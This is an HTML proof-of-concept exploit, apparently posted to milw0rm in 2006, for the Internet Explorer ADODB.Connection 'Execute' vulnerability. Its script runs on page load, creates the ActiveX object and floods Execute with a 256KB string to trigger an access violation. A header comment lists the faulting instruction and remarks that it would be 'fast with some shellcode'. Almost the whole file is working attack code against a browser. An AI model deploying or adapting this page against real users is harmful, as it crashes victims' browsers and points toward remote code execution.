31 lines
No EOL
927 B
HTML
31 lines
No EOL
927 B
HTML
<!--
|
|
// Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC
|
|
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
|
|
// Author: YAG KOHHA (skyhole [at] gmail.com)
|
|
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic
|
|
|
|
// Access violation at:
|
|
// ----------------------------------------------------
|
|
// 77114D0F 66:8B75 00 MOV SI,WORD PTR SS:[EBP]
|
|
// ----------------------------------------------------
|
|
// P.S. It`s will be fast with some shellcode :P
|
|
--!>
|
|
|
|
<html>
|
|
<head>
|
|
<title>ADODB.Connection.Execute CRASH TEST</title>
|
|
</head>
|
|
<script>
|
|
function Bang_Bang() {
|
|
var a = new ActiveXObject('ADODB.Connection.2.7');
|
|
var b = 'FUCK';
|
|
while (b.length <= 1024*256) b+=b;
|
|
for (var i = 0; i < 32768; i++)
|
|
try { a.Execute(b,b,b); } catch(e) {}
|
|
}
|
|
</script>
|
|
<body onLoad='Bang_Bang()'>
|
|
<center><h1>WOW!!! Are U live?</h1></center>
|
|
</body></html>
|
|
|
|
# milw0rm.com [2006-10-24] |